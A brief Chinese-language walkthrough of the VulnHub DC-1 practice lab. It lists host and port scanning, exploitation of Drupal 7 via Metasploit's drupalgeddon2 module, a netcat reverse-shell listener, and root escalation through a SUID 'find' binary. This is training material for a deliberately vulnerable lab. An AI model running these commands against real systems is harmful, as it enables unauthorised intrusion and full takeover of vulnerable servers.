vulnhub DC-1靶场

1.扫描主机

sudo arp-scan -l

扫描端口

nmap -p- 192.168.42.147

扫描主机指纹，发现Drupal 7 cms

2.得到shell（2.1，2.2）只用一种即可

2.1开始msf漏洞利用

mfconsole

search drupal

search 7600

use exploit/unix/webapp/drupal_drupalgeddon2

set rhosts 192.168.42.147

run

2.2脚本exp得到反弹shell

找到脚本，修改脚本，执行脚本

nc 监听 8888 端口 得到反弹shell

python -c "import pty;pty.spawn('/bin/bash')" 美化一下

3.metepreter> 看到这个，说明成功拿下shell

shell

python -c "import pty;pty.spawn('/bin/bash')" 美化一下

4.开始提权

find / -perm -u=s -type f 2>/dev/null

发现/usr/bin/find,利用提权

find . -exec /bin/sh \;

成功提权，寻找flag

本栏目推荐文章
• BOSHIDA DC电源模块的关键参数解读
• vulnhub-DC-6
• BOSHIDA DC电源模块技术的未来发展趋势
• BOSHIDA 了解DC电源模块的基本参数及选择方法
• vulnhub靶场渗透学习
• BOSHIDA DC电源模块的故障排查与维修技巧
• AP5127 DC-DC降压恒流IC 12-24V 9V2A 40珠双色LED车灯方案
• BOSHIDA DC电源模块的安全性能评估及认证标准
• vulnhub-DC-5
• BOSHIDA DC电源模块的可持续发展与环境保护

靶场 vulnhub DC靶场vulnhub dc vulnhub_dc 靶场dc vulnhub-dc vulnhub-dc vulnhub dc vulnhub_dc流程vulnhub dc 靶机vulnhub dc vulnhub-dc流程vulnhub dc vulnhub_dc vulnhub dc wp 靶场vulnhub